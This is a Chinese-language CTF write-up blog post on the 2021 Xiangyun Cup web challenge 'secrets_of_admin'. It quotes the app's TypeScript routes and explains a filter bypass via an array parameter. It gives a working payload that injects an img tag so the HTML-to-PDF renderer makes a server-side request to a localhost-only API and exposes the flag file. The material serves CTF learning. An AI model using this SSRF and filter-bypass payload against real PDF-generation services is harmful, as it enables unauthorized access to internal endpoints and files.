[2021祥云杯]secrets_of_admin writeup + TypeScript看看

最新推荐文章于 2022-05-23 11:41:26 发布
最新推荐文章于 2022-05-23 11:41:26 发布
阅读量2.3k 收藏 3
点赞数 2
分类专栏: # web ctf
不允许转载
本文链接:https://blog.csdn.net/weixin_46081055/article/details/123959252
版权
ctf 同时被 2 个专栏收录
85 篇文章 10 订阅
订阅专栏
web
48 篇文章 2 订阅
订阅专栏

[2021祥云杯]secrets_of_admin

本文来自csdn的⭐️shu天⭐️,平时会记录ctf、取证和渗透相关的文章,欢迎大家来我的主页:shu天_CSDN博客-ctf,取证,web领域博主:https://blog.csdn.net/weixin_46081055 看看ヾ(@ ˘ω˘ @)ノ!!

给了源码
在这里插入图片描述

INSERT INTO users (id, username, password) VALUES (1, 'admin','e365655e013ce7fdbdbf8f27b418c8fe6dc9354dc4c0328fa02b0ea547659645');

在这里插入图片描述
database.ts得到密码登陆进去
在这里插入图片描述
然后分析源码,routes/index.ts内是路由:

比较关键的/admin路由

router.get('/admin', checkAuth, async (req, res) => {	//检测登陆的用户token
    let token = req.signedCookies['token'];
    try {
        const files = await DB.listFile(token.username);
        if (files) {
            res.cookie('token', {username: token.username, files: files, isAdmin: true }, { signed: true })
        }
    } catch (err) {
        return res.render('admin', { error: 'Something wrong ... 👻'})
    }
    return res.render('admin');
});

router.post('/admin', checkAuth, (req, res, next) => {
    let { content } = req.body;		//post请求获取一个content值
    if ( content == '' || content.includes('<') || content.includes('>') || content.includes('/') || content.includes('script') || content.includes('on')){
        // even admin can't be trusted right ? :)  
        return res.render('admin', { error: 'Forbidden word 🤬'});
    } else { //将content的值,放在HTML中,存为template
        let template = `	
        <html>
        <meta charset="utf8">
        <title>Create your own pdfs</title>
        <body>
        <h3>${content}</h3>
        </body>
        </html>
        `
        try {
            const filename = `${uuid()}.pdf`
            pdf.create(template, {	//template解析成PDF并保存到指定的目录中
                "format": "Letter",
                "orientation": "portrait",
                "border": "0",
                "type": "pdf",
                "renderDelay": 3000,
                "timeout": 5000
            }).toFile(`./files/${filename}`, async (err, _) => {
                if (err) next(createError(500));
                const checksum = await getCheckSum(filename);
                await DB.Create('superuser', filename, checksum)
                return res.render('admin', { message : `Your pdf is successfully saved 🤑 You know how to download it right?`});
            });
        } catch (err) {
            return res.render('admin', { error : 'Failed to generate pdf 😥'})
        }
    }
});

/api/files路由

router.get('/api/files', async (req, res, next) => {
    if (req.socket.remoteAddress.replace(/^.*:/, '') != '127.0.0.1') {	//只许127.0.0.1访问
        return next(createError(401));
    }
    let { username , filename, checksum } = req.query;
    if (typeof(username) == "string" && typeof(filename) == "string" && typeof(checksum) == "string") {
        try {
            await DB.Create(username, filename, checksum)	//将username, filename, checksum写进数据库的file表
            return res.send('Done')
        } catch (err) {
            return res.send('Error!')
        }
    } else {
        return res.send('Parameters error')
    }
});

还有读文件的/api/files/:id路由

router.get('/api/files/:id', async (req, res) => {
    let token = req.signedCookies['token']
    if (token && token['username']) {
        if (token.username == 'superuser') {
            return res.send('Superuser is disabled now');   //禁止superuser用户
        }
        try {
            let filename = await DB.getFile(token.username, req.params.id)	//根据用户名与url中传输的id去数据库中查找对应的文件名,getFile方法定义见下
            if (fs.existsSync(path.join(__dirname , "../files/", filename))){
                return res.send(await readFile(path.join(__dirname , "../files/", filename)));	//在../files/路径下读取该文件
            } else {
                return res.send('No such file!');
            }
        } catch (err) {
            return res.send('Error!');
        }
    } else {
        return res.redirect('/');
    }
});

上头的DB.getFiledatabase.ts中的定义,就是根据username和checksum在数据库中找文件

    static getFile(username: string, checksum: string): Promise<any> {
        return new Promise((resolve, reject) => {
            db.get(`SELECT filename FROM files WHERE username = ? AND checksum = ?`, username, checksum, (err , result ) => {
                if (err) return reject(err);
                resolve(result ? result['filename'] : null);
            })
        })
    }

思路:

admin路由中:content传入一个src属性的标签触发SSRF并访问api/files路由,利用/api/files在files表中为admin用户创建一个flag文件,然后通过/api/files/:id路由来读取该文件。

相关漏洞:

1.src属性的标签在html中可以自动触发,或者说是HTML转PDF时,HTML里面的图片资源被自动加载进来
2.includes()方法可利用数组绕过:学习笔记-Nodejs相关 - byc_404’s blog (bycsec.top)

payload:

content[]=<img src="http://127.0.0.1:8888/api/files?username=admin&filename=./flag&checksum=123">
//filename写./flag是因为数据库定义中filename是VARCHAR(255) NOT NULL UNIQUE,不可重复,所以不直接写成flag
传的时候需要url编码
content[]=<img+src%3D"http%3A//127.0.0.1:8888/api/files?username%3Dadmin%26filename%3D./flag%26checksum%3D123">

在这里插入图片描述
访问/api/files/123得到flag

本文来自csdn的⭐️shu天⭐️,平时会记录ctf、取证和渗透相关的文章,欢迎大家来我的主页:shu天_CSDN博客-ctf,取证,web领域博主:https://blog.csdn.net/weixin_46081055 看看ヾ(@ ˘ω˘ @)ノ!!

参考wp: https://blog.z3ratu1.cn/%E7%A5%A5%E4%BA%91%E6%9D%AF2021%20wp.html
还有师傅用的http-pdf 任意文件读取漏洞:
https://suyumen.github.io/2021/10/12/2021-10-12-%5B2021%E7%A5%A5%E4%BA%91%E6%9D%AF%5Dsecrets_of_admin/

shu天
关注
  • 2
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
[2021祥云]secrets_of_admin
Sk1y的博客
05-16 296
[2021祥云]secrets_of_admin 文章目录[2021祥云]secrets_of_admin代码分析/的POST方式/admin的GET方式/admin的POST方式/api/files的GET方式/api/files/:id的GET方式database.ts信息处理解题方法通过img进行ssrf任意文件读取local.href参考链接 代码分析 附件中有3个ts文件,我们主要分析index.ts,而databash.ts可以用来获取很多信息 按路由来分析 /的POST方式 /的POST方
[RooteMe]JSON Web Token (JWT) - Weak secret Writeup
Vicl1fe的博客
12-29 3264
个人博客地址 http://www.darkerbox.com 欢迎大家学习交流 Root-me网址: https://www.root-me.org/en/Challenges/Web-Server/JSON-Web-Token-JWT-Weak-secret 知识点 jwt 弱密钥 前言 继上篇文章JSON Web Token (JWT) - Introduction后: 这篇文章主要...
sharif ctf pwn t00p_secrets writeup
charlie_heng的专栏
02-09 474
这题在比赛的时候没做出来,现在回顾一下,发现其实漏洞挺多的,而且还挺好用的…..(打比赛的时候真的是当局者迷,旁观者清…. 漏洞: 主要的漏洞有两个,两个漏洞都可以分别达到任意内存写,任意内存读的效果 1. 堆off-by-one 当选择字符串的类型的时候,会将读取的字符串后的那个字节置为0,当读取的字符完全占满malloc申请的内存之后,会将下一个堆的size的一个字节置为0 ...
secrets_of_the_oracle_database
09-08
### Oracle数据库的秘密:深入探索未公开特性 #### 一、前言 《Oracle数据库的秘密》是一本由Norbert Debes撰写的专著,该书详细介绍了Oracle数据库中一些鲜为人知但极其有用的特性。这些特性通常不为普通用户所...
_OceanofPDF.com_Smarter_Faster_Better__The_Secrets_of_Bein_-_Charles_Duhigg.pdf
03-27
Smarter_Faster_Better_
CSS Secrets高清_带书签_完整_英文+中文版
03-29
作者叫 Lea Verou,她是一位资深 Web 开发者,有着丰富的实践经验。更重要的是,她是 W3C CSS 工作组的特邀专家——CSS 工作组汇集了这个领域内的专家,他们是制定 CSS 规范、设计 CSS 这门语言的一群人——全球只有...
Secrets_for_All_the_Things:The_Injection_of_Secrets_for_Every
08-29
Secrets for All the Things:云环境中的秘密注入》 在现代云计算环境中,安全问题日益凸显,特别是对于处理敏感信息的应用程序来说,管理并保护这些秘密(如密码、API密钥和私有证书)至关重要。"Secrets for ...
The_SECRETS_OF_POWER_NEGOTIATING_-_ROGER_DAWSON2.pdf
04-29
商务谈判中采用怎样的说话逻辑,如何再谈判之前进行有条理的准备。此书是一点一点粘贴复制的,并非扫描版。
writeup 攻防世界 Decrypt-the-Message
Clover_pofu的博客
05-23 835
攻防世界 Decrypt-the-Message PoemCode
[BUUCTF] 极客大挑战 Secret File writeup
weixin_43919144的博客
04-20 427
打开题目,没发现什么提示,应该是要找什么东西 F12查看源码,发现一个网址 根据提示我们进入了如下页面: 点击下方按钮发现跳转到了一个页面 猜测应该是要抓包,上burpsuite 抓包后放入repeater Go一下得到又一个网址 得到一串代码 <html> <title>secret</title> <meta charset="UTF...
祥云2021 Web复现
feng的博客
08-25 1861
前言 正好buuctf上放了那三道js的题目,就正好复现了一下,学习学习。 cralwer_z 有注册登录,更新个人信息还有爬虫的功能。但是想使用爬虫功能会受到限制: if (/^https:\/\/[a-f0-9]{32}\.oss-cn-beijing\.ichunqiu\.com\/$/.exec(user.bucket)) { return res.json({ message: "Sorry but our remote oss server is under mainte
[2020首届祥云]带音乐家
o3Ev的博客
04-20 278
[2020首届祥云]带音乐家 题目: 下载好附件,打开,得到一个文件与一个rar包: 并且rar包是经过了加密的,我这里去010里看了下,发现并不是伪加密: 所以突破点就只有上面的decode_it文件了,这样直接是打不开的,所以我将它放入010里去看了下,发现: 文件头是MIDI的,所以我将后缀改成了MIDI 然后这里要用到一款工具叫做velato,可以将其解密: 然后在velato文件夹下生成了一个decode_it.exe的程序,运行得到: Hello, World! 这个Hello,
[祥云2021]几道简单题的wp
Huamang的博客
08-22 4316
ezyii https://xz.aliyun.com/t/9948 找yii链子打,开局就给了反序列化,看了一下是文章里面的第四条链子 exp <?php namespace Codeception\Extension{ use Faker\DefaultGenerator; use GuzzleHttp\Psr7\AppendStream; class RunProcess{ protected $output; private $proc
2021第二届“祥云”网络安全大赛 部分Writeup
qq_42815161的博客
08-23 3357
MISC ChieftainsSecret 题目描述:Our agent risked his life to install a mysterious device in the immemorial telephone, can you find out the chieftain's telephone number? Flag format: flag{11 digits} ChieftainsSecret.jpg题目附件给了一张老式轮盘电话机图片,猜测图片藏了东西,直接上linux分
CTF】关于各类CTF竞赛
wuli_kiki的专栏
03-14 6564
DEFCON CTFCTF界最知名影响最广的比赛,历史也相当悠久,已经举办了22届,相当于CTF的“世界”。题目复杂度高,偏向实际软件系统的漏洞挖掘与利用。 除了DEFCON CTF之外还有一些重量级的比赛会作为DEFCON的预选赛,获得这些比赛第一名的战队可以直接入围DEFCON决赛。 原文出自:http://www.xue163.com/88880/249/2499254.html
【CISCN2021】第十四届全国大学生信息安全竞赛初赛-writeup
../../../../../../../
05-17 4405
这一次比赛分为三张“卷子”,我就直接归在一起吧 场景实操Misctiny trafficrunning_pixel Misc tiny traffic 打开流量包 根据文件和题目描述,我们直接导出http对象 可以看到,列表里面含有gzip和br文件,Gzip是一种压缩文件格式并且也是一个在类 Unix 上的一种文件解压缩的软件,BR文件是使用Brotli(一种开源数据压缩算法)压缩的文件 导出来后对这几个gzip和br文件解压缩,先看看flag_wrapper 并没有啥实质性的内容 看看test和se
secrets_client,get_secret_value_response,SecretId=secret_name
最新发布
06-13
这是使用 AWS SDK for Python (Boto3) 获取 AWS Secrets Manager 中的 secret 的代码行。其中,`secrets_client` 是一个 AWS Secrets Manager 的 client 对象,用来执行获取 secret 的操作;`SecretId` 参数指定了要获取的 secret 的名称或 ARN;`get_secret_value_response` 则是获取到的 secret 的值,是一个字典对象,包含了 secret 的信息。 下面是一个示例代码,获取指定名称的 secret 的值: ``` import boto3 # 创建 AWS Secrets Manager 的 client 对象 secrets_client = boto3.client('secretsmanager') # 指定要获取的 secret 的名称或 ARN secret_name = 'my-secret' # 获取 secret 的值 get_secret_value_response = secrets_client.get_secret_value(SecretId=secret_name) # 获取 secret 的值,如果是 JSON 格式,则解析成字典对象 if 'SecretString' in get_secret_value_response: secret = get_secret_value_response['SecretString'] else: secret = get_secret_value_response['SecretBinary'] ``` 注意:在使用 `get_secret_value()` 方法获取 secret 值时,需要有对应的权限。同时,获取到的 secret 值应当妥善保管,避免泄露。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

shu天

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值